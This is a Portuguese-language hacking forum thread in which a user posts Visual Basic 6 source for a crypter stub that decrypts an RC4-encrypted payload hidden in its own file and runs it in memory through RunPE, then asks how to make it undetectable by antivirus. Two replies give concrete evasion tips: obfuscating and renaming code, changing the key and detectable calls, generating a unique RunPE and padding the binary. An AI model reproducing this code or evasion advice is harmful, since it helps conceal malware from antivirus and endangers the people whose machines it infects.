Resultados 1 a 3 de 3
  1. 21 Dec 2011, 19:22 #1
    fr34ker
    fr34ker está desconectado
    Lamer Avatar de fr34ker
    Data de Ingresso
    May 2007
    Localização
    Rio de janeiro
    Posts
    3
    Enviar mensagem por ICQ para fr34ker Enviar mensagem por AIM para fr34ker Enviar mensagem por MSN para fr34ker Enviar mensagem por Yahoo para fr34ker

    Question [duvida] cripter fud indetectavel ?

    Boa noite a todos , primeiramente quero agradecer o forum por postar conteudo de primeira e ser a maior rede no assunto na internet.

    Bom mas vim aqui pra postar uma duvida,ontem tive lendo alguns topicos e vendo algumas video aulas sobre a criaçao de cripters indetectaveis,bom logo corri a atras para fazer o meu porque ja nao guentava mais pegar cripter de terceiros , bom fiz o meu cliente e minha stub perfeitinha do jeito que eu estava imaginando ,porem na hora de testar me deparei com o seguinte problema.



    Como podem ver a stub nao esta assim tao indetectavel ? kkk,parei e pensei po se eu peguei uma source ja disponibilizada na net entao todos os Av's possivelmente tem em seus BDs (se eu estiver enganado me corrijam),bom a minha duvida aqui e a seguinte , como de fato criar uma stub indetectavel ?! sei que essa pergunta e meio estranha ja que pra isso precisa de estudo mas o que eu quero e simplismente isso o caminho pra chegar onde eu quero .

    Vou postar a source da stub para possivel entendimento:
    Código:
    Sub Main()
Dim Data As String
Dim RunPE As New cPEL
Dim buffer() As Byte

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1
Data = Input(LOF(1), 1)
Close #1

Data = Mid(Data, InStr(Data, "_busTer_") + Len("_busTer_"))
Data = RC4.RC4(Data, "busTer")

buffer() = StrConv(Data, vbFromUnicode)

RunPE.RunPE buffer()


End Sub




    Bom isso e tudo pessoal ,espero que possam me ajudar mas se nao puderem ja estou aqui agradecendo a todos pela força.

    By bl4ckb0t[1]
    " Para o que se gosta até fazemos o tempo, mas para o que não se quer, o mesmo sempre faltará "
    Responder com Citação Responder com Citação
  2. 06 Mar 2012, 13:42 #2
    bncrat
    bncrat está desconectado
    Lamer
    Data de Ingresso
    Mar 2012
    Posts
    1
    vc tem que randomizar a src ,indetectar a RUMP

    procura tutos como indetectar src em vb6
    vc pode usar um obfuscador etc
    Responder com Citação Responder com Citação
  3. 30 Apr 2012, 17:23 #3
    striiker
    striiker está desconectado
    Lamer
    Data de Ingresso
    Apr 2012
    Posts
    1
    Bom primeiramente esta Stub Está incompleta , vc ainda não adicionou a RC4 e RunPE
    ao adicionar vamos começar a indetectar

    Sub Main() Dim Data As String Dim RunPE As New cPEL Dim buffer() As Byte Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1 Data = Input(LOF(1), 1) Close #1 Data = Mid(Data, InStr(Data, "_busTer_") + Len("_busTer_")) Data = RC4.RC4(Data, "busTer") buffer() = StrConv(Data, vbFromUnicode) RunPE.RunPE buffer() End Sub
    Bom neste simples codigo temos varias linhas detectáveis como "Data" , "RunPE" , "buffer" alterando os Nomes podemos despistar alguns Av'S
    Tambem o "App.Path & "\" & App.EXEName & ".exe" Que pode ser trocado pela função de slek que usa Hierlang
    E tambem podemos trocar LOF que é muito detectável
    Pode está trocando a chave tambem "_busTer_"
    Gere alguma RunPE use o Unique RunPE Maker de Skyweb
    Compile adicione um form e varios componentes nele e compila como Small Code

    Bom axo que neste pequeno tutorial vc pode deixar indetectável para avast/avg/e mais uns 7
    Última edição por M4CK; 30 Apr 2012 às 17:28.
    Responder com Citação Responder com Citação
« Tópico Anterior | Próximo Tópico »

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •  

Regras do Fórum